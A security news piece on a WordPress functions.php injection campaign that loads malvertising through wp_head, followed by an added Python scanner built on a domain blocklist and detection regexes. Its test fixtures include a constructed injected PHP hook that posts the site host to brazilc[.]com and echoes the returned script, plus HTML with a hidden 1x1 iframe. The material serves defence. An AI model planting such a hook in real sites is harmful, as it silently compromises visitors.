[Figure: WordPress security breach illustration showing a hacker injecting PHP code into functions.php, a JavaScript fetch from brazilc[.]com into the site's head, pop-up/redirect symbols, a hidden iframe mimicking Cloudflare, and a protective lock on the theme folder.]

Hackers are silently weaponizing WordPress sites by injecting malicious PHP into theme files, particularly functions.php, to run malvertising and compromise visitors without altering any visible content. The campaign, which Sucuri uncovered after site owners noticed unexplained script loads, executes on every page request via the wp_head hook: the injected code fetches obfuscated JavaScript from attacker-controlled domains such as brazilc[.]com/ads.php and embeds it in the HTML <head> so that it runs before the rest of the page.


The intrusions exploit weak file permissions, outdated themes, and vulnerable plugins or compromised credentials to append a benign-looking function that POSTs to a command-and-control (C2) server for dynamic payloads. The returned scripts load traffic-direction code from porsasystem.com/6m9x.js and inject hidden 1x1 iframes that mimic Cloudflare challenges, enabling forced redirects and pop-ups while evading security tools by passing as legitimate CDN activity.
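The two indicators the article gives a defender to look for are (1) theme PHP that hooks wp_head and pulls remote content into the page, and (2) rendered HTML whose head loads scripts from the named domains or carries a hidden 1x1 iframe dressed up as a Cloudflare challenge. The scanner below is an added example written for this page, not Sucuri's or NPAV's tooling; the domains come from the article, while the PHP and HTML fixtures are constructed to have the shape the text describes and are not captured samples.

```python
"""Indicator scan for the functions.php / wp_head injection pattern described above.

Added example, not Sucuri's or NPAV's tooling. The blocklisted domains are the
ones named in the article; the fixtures below are constructed, not captured.
"""
from __future__ import annotations

import re
import sys
from pathlib import Path

# Domains named in the write-up (defang brackets are stripped before matching).
BLOCKLISTED_DOMAINS = {"brazilc.com", "porsasystem.com"}

# Theme-PHP heuristics: a wp_head hook plus a remote fetch in the same file,
# an obfuscation/eval primitive, or a hard-coded reference to a known-bad host.
WP_HEAD_HOOK = re.compile(r"add_action\s*\(\s*['\"]wp_head['\"]", re.I)
REMOTE_FETCH = re.compile(r"\b(wp_remote_(get|post)|curl_exec|file_get_contents)\s*\(", re.I)
OBFUSCATION = re.compile(r"\b(base64_decode|eval|gzinflate|str_rot13)\s*\(", re.I)
URL_IN_CODE = re.compile(r"https?://([A-Za-z0-9.\-\[\]]+)", re.I)

# Rendered-HTML heuristics: external script sources and 1x1 iframes.
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']https?://([^/\"']+)", re.I)
TINY_IFRAME = re.compile(
    r"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?1(?=[\"'\s>/])[^>]*>", re.I
)


def defang_strip(host: str) -> str:
    """Turn brazilc[.]com into brazilc.com so defanged and live forms compare equal."""
    return host.replace("[.]", ".").lower()


def scan_theme_php(source: str) -> list[str]:
    """Return findings for the contents of one theme PHP file (empty list = clean)."""
    findings: list[str] = []
    if WP_HEAD_HOOK.search(source) and REMOTE_FETCH.search(source):
        findings.append("wp_head hook callback performs a remote fetch")
    if OBFUSCATION.search(source):
        findings.append("obfuscation/eval primitive present")
    for m in URL_IN_CODE.finditer(source):
        host = defang_strip(m.group(1))
        if host in BLOCKLISTED_DOMAINS:
            findings.append(f"reference to blocklisted domain {host}")
    return findings


def scan_rendered_html(html: str) -> list[str]:
    """Return findings for a fetched page: bad script hosts and hidden 1x1 iframes."""
    findings: list[str] = []
    for m in SCRIPT_SRC.finditer(html):
        host = defang_strip(m.group(1))
        if host in BLOCKLISTED_DOMAINS:
            findings.append(f"script loaded from blocklisted domain {host}")
    for m in TINY_IFRAME.finditer(html):
        if "cloudflare" in m.group(0).lower():
            findings.append("1x1 iframe styled as Cloudflare challenge")
        else:
            findings.append("1x1 iframe present")
    return findings


def scan_theme_dir(theme_dir: Path) -> dict[str, list[str]]:
    """Walk a theme folder (e.g. wp-content/themes/<theme>) and report per-file findings."""
    report = {}
    for php in sorted(theme_dir.rglob("*.php")):
        hits = scan_theme_php(php.read_text(errors="replace"))
        if hits:
            report[str(php)] = hits
    return report


# Constructed fixtures shaped like the article's description (not real samples).
CLEAN_FUNCTIONS_PHP = """<?php
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_style('theme-style', get_stylesheet_uri());
});
"""

INJECTED_FUNCTIONS_PHP = """<?php
// benign-looking helper appended at the end of the file
function theme_head_init() {
    $r = wp_remote_post('https://brazilc[.]com/ads.php', array('body' => array('h' => $_SERVER['HTTP_HOST'])));
    echo wp_remote_retrieve_body($r);
}
add_action('wp_head', 'theme_head_init');
"""

INJECTED_HEAD_HTML = """<html><head><title>Blog</title>
<script src="https://porsasystem.com/6m9x.js"></script>
</head><body>
<iframe src="https://cloudflare-challenge.example/verify" width="1" height="1" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    # Usage: python scan.py /path/to/wp-content/themes/<theme>
    if len(sys.argv) > 1:
        for path, hits in scan_theme_dir(Path(sys.argv[1])).items():
            print(path, "->", "; ".join(hits))
    else:
        print("clean fixture:", scan_theme_php(CLEAN_FUNCTIONS_PHP))
        print("injected fixture:", scan_theme_php(INJECTED_FUNCTIONS_PHP))
        print("rendered page:", scan_rendered_html(INJECTED_HEAD_HTML))
```

The file-side and page-side checks are deliberately separate: a compromised functions.php is what you find on disk, but the injected script only appears in served HTML, so comparing the two (disk clean, page dirty) also flags injections living outside the theme folder. Treat the domain list as a starting point and feed it from your own blocklist.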


Security vendors have blocklisted the domains involved, but the campaign's stealth highlights the need for strict file permissions, regular theme and plugin updates, and monitoring for anomalous JavaScript loads to prevent silent takeovers and protect user traffic.

NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, Z Plus Security